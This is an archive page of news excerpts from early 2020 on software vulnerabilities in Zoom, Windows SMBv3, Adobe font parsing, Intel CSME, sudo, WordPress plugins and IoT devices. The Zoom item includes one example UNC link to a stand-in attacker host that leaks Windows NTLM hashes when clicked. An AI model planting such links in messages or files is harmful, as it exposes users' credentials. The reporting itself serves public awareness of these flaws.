Archive for the ‘vulnerabilities’ Category

Attackers can use Zoom to steal users’ Windows credentials with no warning

April 1st, 2020
Attackers can use Zoom to steal users’ Windows credentials with no warning

Enlarge (credit: Christopher Blizzard)

Users of Zoom for Windows beware: the widely used software has a vulnerability that allows attackers to steal your operating system credentials, researchers said.

Discovery of the currently unpatched vulnerability comes as Zoom usage has soared in the wake of the coronavirus pandemic. With massive numbers of people working from home, they rely on Zoom to connect with co-workers, customers, and partners. Many of these home users are connecting to sensitive work networks through temporary or improvised means that don’t have the benefit of enterprise-grade firewalls found on-premises.

Embed network location here

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings—such as //attacker.example.com/C$—into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

Read 10 remaining paragraphs | Comments

Posted in Biz & IT, credentials, exploits, vulnerabilities, Windows, zoom | Comments (0)

Windows code-execution zeroday is under active exploit, Microsoft warns

March 23rd, 2020
Windows code-execution zeroday is under active exploit, Microsoft warns

Enlarge (credit: Windows)

Attackers are actively exploiting a Windows zero-day vulnerability that can execute malicious code on fully updated systems, Microsoft warned on Monday.

The font-parsing remote code-execution vulnerability is being used in “limited targeted attacks,” the software maker said in an advisory published on Monday morning. The security flaw exists in the Adobe Type Manager Library, a Windows DLL file that a wide variety of apps use to manage and render fonts available from Adobe Systems. The vulnerability consists of two code-execution flaws that can be triggered by the improper handling of maliciously crafted master fonts in the Adobe Type 1 Postscript format. Attackers can exploit them by convincing a target to open a booby-trapped document or viewing it in the Windows preview pane.

“Microsoft is aware of limited, targeted attacks that attempt to leverage this vulnerability,” Monday’s advisory warned.

Read 8 remaining paragraphs | Comments

Posted in Biz & IT, exploits, Flaw, microsoft, vulnerabilities, Windows | Comments (0)

Critical bugs in dozens of Zyxel and Lilin IoT models under active exploit

March 21st, 2020
The word

Enlarge (credit: Frank Lindecke / Flickr)

Criminals are exploiting critical flaws to corral Internet-of-things devices from two different manufacturers into botnets that wage distributed denial-of-service attacks, researchers said this week. Both DVRs from Lilin and storage devices from Zyxel are affected, and users should install updates as soon as possible.

Multiple attack groups are exploiting the Lilin DVR vulnerability to conscript them into DDoS botnets known as FBot, Chalubo, and Moobot, researchers from security firm Qihoo 360 said on Friday. The latter two botnets are spinoffs of Mirai, the botnet that used hundreds of thousand of IoT devices to bombard sites with record-setting amounts of junk traffic.

The DVR vulnerability stems from three flaws that allow attackers to remotely inject malicious commands into the device. The bugs are: (1) hard-coded login credentials present in the device, (2) command-injection flaws, and (3) arbitrary file reading weaknesses. The injected parameters affect the device capabilities for file transfer protocol, network time protocol, and the update mechanism for network time protocol.

Read 4 remaining paragraphs | Comments

Posted in Biz & IT, DVRs, exploits, Internet of things, lilin, network attached storage, vulnerabilities, Zyxel | Comments (0)

Microsoft delivers emergency patch to fix wormable Windows 10 flaw

March 12th, 2020
Stock photo of a beat-up pair of jeans.

Enlarge (credit: Cortney Dean / Flickr)

Microsoft on Thursday released an unscheduled fix for a critical security bug that makes it possible for attackers to remotely execute malicious code that can spread from vulnerable machine to vulnerable machine without requiring any interaction from users.

The flaw, in version 3 of Microsoft's implementation of the Server Message block protocol, is present only in 32- and 64-bit Windows 10 versions 1903 and 1909 for clients and servers. Although the vulnerability is difficult to exploit in a reliable way, Microsoft and outside researchers consider it critical because it opens large networks to "wormable" attacks, in which the compromise of a single machine can trigger a chain reaction that causes all other Windows machines to quickly become infected. That's the scenario that played on with the WannaCry and NotPetya in 2017.

In a bulletin accompanying Thursday's patch, Microsoft said it has no evidence the flaw is being actively exploited, but the company went on to label the bug as "exploitation more likely." That designation means malicious actors will probably develop and use exploits in the future.

Read 13 remaining paragraphs | Comments

Posted in Biz & IT, exploits, microsoft, Server Message Block, SMB, vulnerabilities, Windows 10 | Comments (0)

Windows has a new wormable vulnerability, and there’s no patch in sight

March 11th, 2020
Close-up photo of police-style caution tape stretched across an out-of-focus background.

Enlarge (credit: Michael Theis / Flickr)

Word leaked out on Tuesday of a new vulnerability in recent versions of Windows that has the potential to unleash the kind of self-replicating attacks that allowed the WannaCry and NotPetya worms to cripple business networks around the world.

The vulnerability exists in version 3.1.1 of the Server Message Block 3.1.1 that’s used to share files, printers, and other resources on local networks and over the Internet. Attackers who successfully exploit the flaw can execute code of their choice on both servers and end-user computers that use the vulnerable protocol, Microsoft said in this bare-bones advisory.

The flaw, which is tracked as CVE-2020-0796, affects Windows 10 and Windows Server 2019, which are relatively new releases that Microsoft has invested huge amounts of resources hardening against precisely these types of attacks. Patches aren’t available, and Tuesday’s advisory gave no timeline for one being released. Asked if there was a timeline for releasing a fix, a Microsoft representative said: “Beyond the advisory you linked, nothing else to share from Microsoft at this time.”

Read 15 remaining paragraphs | Comments

Posted in Biz & IT, computer worms, exploits, microsoft, vulnerabilities, Windows | Comments (0)

5 years of Intel CPUs and chipsets have a concerning flaw that’s unfixable

March 5th, 2020
Promotional image of computer processor.

Enlarge / An 8th-generation Intel Core Processor. (credit: Intel)

Virtually all Intel chips released in the past five years contain an unfixable flaw that may allow sophisticated attackers to defeat a host of security measures built into the silicon. While Intel has issued patches to lessen the damage of exploits and make them harder, security firm Positive Technologies said the mitigations may not be enough to fully protect systems.

The flaw resides in the Converged Security and Management Engine, a subsystem inside Intel CPUs and chipsets that’s roughly analogous to AMD’s Platform Security Processor. Often abbreviated as CSME, this feature implements the firmware-based Trusted Platform Module used for silicon-based encryption, authentication of UEFI BIOS firmware, Microsoft System Guard and BitLocker, and other security features. The bug stems from the failure of the input-output memory management unit—which provides protection preventing the malicious modification of static random-access memory—to implement early enough in the firmware boot process. That failure creates a window of opportunity for other chip components, such as the Integrated Sensor Hub, to execute malicious code that runs very early in the boot process with the highest of system privileges.

Jeopardizing Intel’s root of trust

Because the flaw resides in the CSME mask ROM, a piece of silicon that boots the very first piece of CSME firmware, the vulnerability can’t be patched with a firmware update.

Read 9 remaining paragraphs | Comments

Posted in Biz & IT, chipsets, CPUs, exploits, firmware, hacking, Intel, vulnerabilities | Comments (0)

Hackers exploit critical vulnerability found in ~100,000 WordPress sites

February 18th, 2020
Image of ones and zeros with the word

(credit: Pixy)

Hackers are actively exploiting a critical WordPress plugin vulnerability that allows them to completely wipe all website databases and, in some cases, seize complete control of affected sites.

The flaw is in the ThemeGrill Demo Importer installed on some 100,000 sites, and it was disclosed over the weekend by Website security company WebARX. By Tuesday, WebArx reported that the flaw was under active exploit with almost 17,000 attacks blocked so far. Hanno Böck, a journalist who works for Golem.de, had spotted active attacks several hours before and reported them on Twitter.

"There's currently a severe vuln in a wordpress plugin called "themegrill demo importer" that resets the whole database," Böck wrote. "https://webarxsecurity.com/critical-issue-in-themegrill-demo-importer/ It seems attacks are starting: Some of the affected webpages show a wordpress 'hello world'-post. /cc If you use this plugin and your webpage hasn't been deleted yet consider yourself lucky. And remove the plugin. (Yes, remove it, don't just update.)"

Read 8 remaining paragraphs | Comments

Posted in Biz & IT, exploits, Plugin, vulnerabilities, WordPress | Comments (0)

Serious flaw that lurked in sudo for 9 years finally gets a patch

February 4th, 2020
An excerpt from the xkcd comic strip parodies sudo.

Enlarge (credit: xkcd)

Sudo, a utility found in dozens of Unix-like operating systems, has received a patch for a potentially serious bug that allows unprivileged users to easily obtain unfettered root privileges on vulnerable systems.

The vulnerability, tracked as CVE-2019-18634, is the result of a stack-based buffer-overflow bug found in versions 1.7.1 through 1.8.25p1. It can be triggered only when either an administrator or a downstream OS, such as Linux Mint and Elementary OS, has enabled an option known as pwfeedback. With pwfeedback turned on, the vulnerability can be exploited even by users who aren't listed in sudoers, a file that contains rules that users must follow when using the sudo command.

Sudo is a powerful utility that’s included in most if not all Unix- and Linux-based OSes. It allows administrators to allow specific individuals or groups to run commands or applications with higher-than-usual system privileges. Both Apple’s macOS and Debian distributions of Linus received updates last week. People using other OSes should check their configurations and version numbers to ensure they’re not vulnerable.

Read 9 remaining paragraphs | Comments

Posted in Biz & IT, linux, MacOS, Sudo, UNIX, vulnerabilities | Comments (0)

Researchers find serious flaws in WordPress plugins used on 400k sites

January 17th, 2020
The word

Enlarge (credit: Frank Lindecke / Flickr)

Serious vulnerabilities have recently come to light in three WordPress plugins that have been installed on a combined 400,000 websites, researchers said. InfiniteWP, WP Time Capsule, and WP Database Reset are all affected.

The highest-impact flaw is an authentication bypass vulnerability in the InfiniteWP Client, a plugin installed on more than 300,000 websites. It allows administrators to manage multiple websites from a single server. The flaw lets anyone log in to an administrative account with no credentials at all. From there, attackers can delete contents, add new accounts, and carry out a wide range of other malicious tasks.

People exploiting the vulnerability need only know the user name of a valid account and include a malicious payload in a POST request that's sent to a vulnerable site. According to Web application firewall provider Wordfence, the vulnerability stems from a feature that allows legitimate users to automatically log in as an administrator without providing a password.

Read 6 remaining paragraphs | Comments

Posted in Biz & IT, Plugins, vulnerabilities, Websites, WordPress | Comments (0)

Critical Windows 10 vulnerability used to Rickroll the NSA and Github

January 16th, 2020
Chrome on Windows 10 as it Rickrolls the NSA.

Enlarge / Chrome on Windows 10 as it Rickrolls the NSA. (credit: https://twitter.com/saleemrash1d/status/1217519809732259840/photo/1)

Less than a day after Microsoft disclosed one of the most critical Windows vulnerabilities ever, a security researcher has demonstrated how attackers can exploit it to cryptographically impersonate any website or server on the Internet.

Researcher Saleem Rashid on Wednesday tweeted images of the video "Never Gonna Give You Up," by 1980s heartthrob Rick Astley, playing on Github.com and NSA.gov. The digital sleight of hand is known as Rickrolling and is often used as a humorous and benign way to demonstrate serious security flaws. In this case, Rashid's exploit causes both the Edge and Chrome browsers to spoof the HTTPS verified websites of Github and the National Security Agency. Brave and other Chrome derivatives, as well as Internet Explorer, are also likely to fall to the same trick. (There's no indication Firefox is affected.)

Rashid's simulated attack exploits CVE-2020-0601, the critical vulnerability that Microsoft patched on Tuesday after receiving a private tipoff from the NSA. As Ars reported, the flaw can completely break certificate validation for websites, software updates, VPNs, and other security-critical computer uses. It affects Windows 10 systems, including server versions Windows Server 2016 and Windows Server 2019. Other versions of Windows are unaffected.

Read 17 remaining paragraphs | Comments

Posted in Biz & IT, Certificates, cryptography, exploits, validation, vulnerabilities, Windows 10 | Comments (0)